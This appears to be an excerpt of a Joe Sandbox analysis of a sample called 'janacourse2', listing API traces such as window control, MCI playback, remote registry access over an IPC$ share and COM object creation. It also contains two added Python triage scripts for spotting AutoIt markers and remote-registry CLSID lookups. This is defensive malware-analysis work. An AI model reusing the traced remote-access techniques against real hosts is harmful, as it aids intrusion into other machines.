• CloseHandle.KERNEL32(00000000), ref: 01023E6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
• Opcode ID: 5675cdd8f49108b7ea4f6927b9acfbea62852f8dfc2f095afd5d94758c7ef34a
• Instruction ID: d39aca26f33015cf4123b197490a038a9052862d53daf4a3d6abcad91b84c09a
• Opcode Fuzzy Hash: 5675cdd8f49108b7ea4f6927b9acfbea62852f8dfc2f095afd5d94758c7ef34a
• Instruction Fuzzy Hash: BA31D6B6A00119ABEB219BA4DD85FEF37BDFF88700F1040B5F649D6154E77892448B24
APIs
• timeGetTime.WINMM ref: 0101E6B4
  • Part of subcall function 00FCE551: timeGetTime.WINMM(?,?,0101E6D4), ref: 00FCE555
• Sleep.KERNEL32(0000000A), ref: 0101E6E1
• EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0101E705
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0101E727
• SetActiveWindow.USER32 ref: 0101E746
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0101E754
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0101E773
• Sleep.KERNEL32(000000FA), ref: 0101E77E
• IsWindow.USER32 ref: 0101E78A
• EndDialog.USER32(00000000), ref: 0101E79B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 20ac09bf909059a9f895da78a0a079f1c91c4e51a717cf3cae03fd56d4402c6d
• Instruction ID: c09d88374141d1a6abcff21b339036f933603da3feded4289777ce888040d35b
• Opcode Fuzzy Hash: 20ac09bf909059a9f895da78a0a079f1c91c4e51a717cf3cae03fd56d4402c6d
• Instruction Fuzzy Hash: 382162B5205205AFFB225F64EEC9A2D3BA9FB49788B444424F9C18215DDB7FAC20CB54
APIs
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0101EA5D
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0101EA73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101EA84
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0101EA96
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0101EAA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: 3be55fac658cdf458ce7c172ebe534a306bcb6d99b62185193fa905eab7bfe2a
• Instruction ID: 6767a29330fd9ead0b54abb2502d828e945b6a6b000e608ea55fb31d5086e04c
• Opcode Fuzzy Hash: 3be55fac658cdf458ce7c172ebe534a306bcb6d99b62185193fa905eab7bfe2a
• Instruction Fuzzy Hash: 5111E331A8026979E720A3A7DC4ADFF7EBCEBC1F00F440429B842A6081EEA51905C9B0
APIs
• GetDlgItem.USER32(?,00000001), ref: 01015CE2
• GetWindowRect.USER32(00000000,?), ref: 01015CFB
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 01015D59
• GetDlgItem.USER32(?,00000002), ref: 01015D69
• GetWindowRect.USER32(00000000,?), ref: 01015D7B
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 01015DCF
• GetDlgItem.USER32(?,000003E9), ref: 01015DDD
• GetWindowRect.USER32(00000000,?), ref: 01015DEF
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 01015E31
• GetDlgItem.USER32(?,000003EA), ref: 01015E44
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 01015E5A
• InvalidateRect.USER32(?,00000000,00000001), ref: 01015E67
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
                                                                                                            • API String ID: 3096461208-0
                                                                                                            • Opcode ID: 6a8395f211012ff490f901d4a3970e94226c34a6adf3f03c293142b7b1fcec4c
                                                                                                            • Instruction ID: f5fcf6b151477c091a3b9a05449170bd26e9c7c6364389e2f53e6e227d6b3fab
                                                                                                            • Opcode Fuzzy Hash: 6a8395f211012ff490f901d4a3970e94226c34a6adf3f03c293142b7b1fcec4c
                                                                                                            • Instruction Fuzzy Hash: 55511CB4B00205AFDB18DF68CE89AAEBBF5FB89300F508169F955E7294D775AD00CB50
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FC8BE8,?,00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 00FC8FC5
                                                                                                            • DestroyWindow.USER32(?), ref: 00FC8C81
                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 00FC8D1B
                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 01006973
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 010069A1
                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 010069B8
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FC8BBA,00000000), ref: 010069D4
                                                                                                            • DeleteObject.GDI32(00000000), ref: 010069E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 641708696-0
                                                                                                            • Opcode ID: 7ab3213d8a16c64b5c8f604fc3c34f538bfe73bd30b8415fcb112ee62cc265fa
                                                                                                            • Instruction ID: f168de3497e9d3d258fc2dbc652c589944f3122488471a0bf1f0654e457e3ca2
                                                                                                            • Opcode Fuzzy Hash: 7ab3213d8a16c64b5c8f604fc3c34f538bfe73bd30b8415fcb112ee62cc265fa
                                                                                                            • Instruction Fuzzy Hash: EC618931506602DFEB36DF18DB4AB6977F2FF41352F14455CE0C286994CB3AA892EB90
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9944: GetWindowLongW.USER32(?,000000EB), ref: 00FC9952
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00FC9862
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ColorLongWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 259745315-0
                                                                                                            • Opcode ID: 61a826c2e93bb0fcd80412a77e8d8d275921c2e663f3a8fb017f6696efa52286
                                                                                                            • Instruction ID: 749bdb73eb1802dca3f6f05c13c2812a74dc0d172a0024b028670b36942aa436
                                                                                                            • Opcode Fuzzy Hash: 61a826c2e93bb0fcd80412a77e8d8d275921c2e663f3a8fb017f6696efa52286
                                                                                                            • Instruction Fuzzy Hash: BC413531504640AFEB314F389A89FB93BA5FB07331F544249FAE2871E1C7B69842EB10
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00FFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 01019717
                                                                                                            • LoadStringW.USER32(00000000,?,00FFF7F8,00000001), ref: 01019720
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00FFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 01019742
                                                                                                            • LoadStringW.USER32(00000000,?,00FFF7F8,00000001), ref: 01019745
                                                                                                            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 01019866
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                            • API String ID: 747408836-2268648507
                                                                                                            • Opcode ID: 4c4c2dded8831ada303748c6f5c51660212ece35a6e6e57f4b70dc5e28ab3872
                                                                                                            • Instruction ID: d8b8e26d54bbc0402b87c42ddc18c42487c59a4eade9d7fdf12734ab0c4225ed
                                                                                                            • Opcode Fuzzy Hash: 4c4c2dded8831ada303748c6f5c51660212ece35a6e6e57f4b70dc5e28ab3872
                                                                                                            • Instruction Fuzzy Hash: 1B418E7280420AABDB04EBE1CE92DEEB779AF14304F540025F60172096EB796F48DF60
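The format strings in the String ID of this record ("Line %d (File "%s"):", "Line %d:", "^ ERROR", "%s (%d) : ==> %s: %s %s") are the ones the AutoIt3 interpreter loads with LoadStringW and hands to MessageBoxW when a script hits a runtime error; their presence is one of the static hints behind the "Binary is likely a compiled AutoIt script file" signature in this report. The Python below is an added triage check and not part of the Joe Sandbox report: it searches a memory dump for those markers in UTF-16LE (the encoding of the PE string table that LoadStringW reads) and in ASCII, and only treats the buffer as AutoIt-like when several markers co-occur, since "Line %d:" alone is too generic. The sample buffer is constructed inline, so the offsets it reports apply to that constructed input only.

```python
"""Triage check for AutoIt3 runtime error-dialog strings in a memory dump.

Added example, not part of the Joe Sandbox report. The markers are the
format strings visible in the record above; the sample buffer is
constructed here so the script runs offline.
"""
from typing import Dict, List

# Format strings the AutoIt3 interpreter uses for its script error dialog.
AUTOIT_ERROR_MARKERS: List[str] = [
    'Line %d (File "%s"):',
    "Line %d:",
    "^ ERROR",
    "%s (%d) : ==> %s: %s %s",
]


def find_autoit_error_strings(buf: bytes) -> Dict[str, List[int]]:
    """Return {marker: [offsets]} for each marker found as UTF-16LE or ASCII.

    LoadStringW pulls these from the PE string table, which stores them as
    UTF-16LE, so that encoding is the primary one; the ASCII form is checked
    too in case a dump carries a narrow copy.
    """
    hits: Dict[str, List[int]] = {}
    for marker in AUTOIT_ERROR_MARKERS:
        offsets: List[int] = []
        for needle in (marker.encode("utf-16-le"), marker.encode("ascii")):
            start = 0
            while (pos := buf.find(needle, start)) != -1:
                offsets.append(pos)
                start = pos + 1
        if offsets:
            hits[marker] = sorted(offsets)
    return hits


def looks_like_autoit_runtime(buf: bytes, min_markers: int = 2) -> bool:
    """Require several distinct markers together before calling it AutoIt."""
    return len(find_autoit_error_strings(buf)) >= min_markers


def build_sample_dump() -> bytes:
    """Constructed stand-in for a .sdmp region: zero filler with the markers
    embedded as UTF-16LE, in AUTOIT_ERROR_MARKERS order, 64 bytes apart."""
    filler = b"\x00" * 64
    parts = [filler]
    for marker in AUTOIT_ERROR_MARKERS:
        parts.append(marker.encode("utf-16-le"))
        parts.append(filler)
    return b"".join(parts)


if __name__ == "__main__":
    sample = build_sample_dump()
    for marker, offs in find_autoit_error_strings(sample).items():
        print(f"{marker!r:32} at {[hex(o) for o in offs]}")
    print("AutoIt runtime markers present:", looks_like_autoit_runtime(sample))
```

To use it on a real dump from this report, read the .sdmp file as bytes and pass it to looks_like_autoit_runtime(); the hit offsets are relative to the start of the dump, so add the dump's base (00FB0000 here) to get virtual addresses.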
APIs
  • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010107A2
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010107BE
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010107DA
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01010804
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0101082C
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01010837
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0101083C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
• Opcode ID: 79d383d82d86e687c17f52f18570dffeb38b0d85371a308565fbf2c56d928e93
• Instruction ID: 9eafbc7cb1b762f5424b174b7f1a98048391dadef0171a6f0bfefeafdb16ae05
• Opcode Fuzzy Hash: 79d383d82d86e687c17f52f18570dffeb38b0d85371a308565fbf2c56d928e93
• Instruction Fuzzy Hash: 20414672C00228ABDF21EBA5DC85CEEB7B8BF04340B444169F981A7155EB399A44DFA0
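The call order in this record is worth reading as a chain rather than as isolated APIs: WNetAddConnection2W maps a share (the \IPC$ string), RegConnectRegistryW with 80000002 (HKEY_LOCAL_MACHINE) opens the remote registry, RegOpenKeyExW with samDesired 00020019 (KEY_READ) opens a key under SOFTWARE\Classes\, RegQueryValueExW reads it (the \CLSID string), and CLSIDFromString turns the result into a CLSID. That is a ProgID-to-CLSID resolution against another host's registry, consistent with the remote-host path of AutoIt's ObjCreate (an inference from the calls and strings; the report itself does not name the function). The Python below is an added example and not the report's tooling: it parses lines of the "API.MODULE(args), ref: addr" form shown in this report into records, decodes the hive and access-mask constants, and flags that ordered chain. The chain definition is this script's own heuristic; the sample lines are copied from the record above.

```python
"""Parse Joe Sandbox 'APIs' lines and flag a remote-registry CLSID lookup.

Added example, not part of the report. SAMPLE_LINES are copied from the
record above; the ordered chain in flag_remote_clsid_lookup() is this
script's own heuristic for that pattern.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One report line: optional "Part of subcall function XXXX:" prefix, then
# API.MODULE, an optional (args) list, then "ref: <hex call-site address>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

HKEY_NAMES = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
}
# samDesired values worth recognising (winreg.h).
SAM_NAMES = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}

# Copied from the report record above (sample input for this script).
SAMPLE_LINES = r"""
  • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010107A2
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010107BE
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010107DA
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01010804
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0101082C
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01010837
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0101083C
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]   # argument/stack slots as printed: hex, '?' or text
    ref: int          # address of the call site
    subcall: bool     # True when reported from a called function


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn report lines into ApiCall records, skipping anything else."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), "Part of subcall" in line))
    return calls


def hex_arg(value: str) -> Optional[int]:
    """Decode a printed argument; '?' and text slots give None."""
    try:
        return int(value, 16)
    except ValueError:
        return None


def name_const(table: Dict[int, str], value: Optional[int]) -> str:
    return "?" if value is None else table.get(value, hex(value))


def flag_remote_clsid_lookup(calls: List[ApiCall]) -> Optional[Dict[str, str]]:
    """Return details when the calls, in order, show a share connect, a
    remote registry connect, a SOFTWARE\\Classes\\ open and CLSIDFromString."""
    stage, info = 0, {}
    for c in calls:
        if stage == 0 and c.api == "WNetAddConnection2W":
            stage = 1
        elif stage == 1 and c.api == "RegConnectRegistryW":
            hive = hex_arg(c.args[1]) if len(c.args) > 1 else None
            info["hive"] = name_const(HKEY_NAMES, hive)
            stage = 2
        elif (stage == 2 and c.api == "RegOpenKeyExW"
              and any("SOFTWARE\\Classes\\" in a for a in c.args)):
            sam = hex_arg(c.args[3]) if len(c.args) > 3 else None
            info["sam"] = name_const(SAM_NAMES, sam)
            stage = 3
        elif stage == 3 and c.api == "CLSIDFromString":
            info["clsid_resolved_at"] = hex(c.ref)
            return info
    return None


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LINES)
    print(f"parsed {len(calls)} calls")
    print("remote CLSID lookup:", flag_remote_clsid_lookup(calls))
```

The parser accepts the whole "Executed Functions" text of a report, so the same chain check can be run across every record rather than this one; the argument slots are kept as printed because Joe Sandbox lists stack context alongside real parameters, and a slot such as "?" carries no value to decode.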
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 01033C5C
                                                                                                            • CoInitialize.OLE32(00000000), ref: 01033C8A
                                                                                                            • CoUninitialize.OLE32 ref: 01033C94
                                                                                                            • _wcslen.LIBCMT ref: 01033D2D
                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 01033DB1
                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 01033ED5
                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 01033F0E
                                                                                                            • CoGetObject.OLE32(?,00000000,0104FB98,?), ref: 01033F2D
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 01033F40
                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01033FC4
                                                                                                            • VariantClear.OLEAUT32(?), ref: 01033FD8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 429561992-0
                                                                                                            • Opcode ID: a73e65d80eb157bed77e4f0044ace232e172586b1f716f4524502542a261d381
                                                                                                            • Instruction ID: 9b79e729b0a72f6c293053e31b9eff424417b3bd437ecaaed07699c2fd539351
                                                                                                            • Opcode Fuzzy Hash: a73e65d80eb157bed77e4f0044ace232e172586b1f716f4524502542a261d381
                                                                                                            • Instruction Fuzzy Hash: 15C130B1608205AFD700DF68C98496BBBE9FFC9748F00495DF98A9B250DB31ED05CB62
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000), ref: 01027AF3
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 01027B8F
                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 01027BA3
                                                                                                            • CoCreateInstance.OLE32(0104FD08,00000000,00000001,01076E6C,?), ref: 01027BEF
                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 01027C74
                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 01027CCC
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 01027D57
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 01027D7A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 01027D81
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 01027DD6
                                                                                                            • CoUninitialize.OLE32 ref: 01027DDC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: f78ce7a39b13f1a88736f06bddc9cad4371aad281463cc264e501a17b090bc38
• Instruction ID: 130a4c421a298687c8f3bc3b71746e08d91dfa941b142d470b49b57c5af58be6
• Opcode Fuzzy Hash: f78ce7a39b13f1a88736f06bddc9cad4371aad281463cc264e501a17b090bc38
• Instruction Fuzzy Hash: 3AC15A75A00119AFDB10DFA4C984DAEBBF9FF48304B148099E95ADB261DB35ED41CF90
APIs
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01045504
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01045515
• CharNextW.USER32(00000158), ref: 01045544
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01045585
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0104559B
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010455AC
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
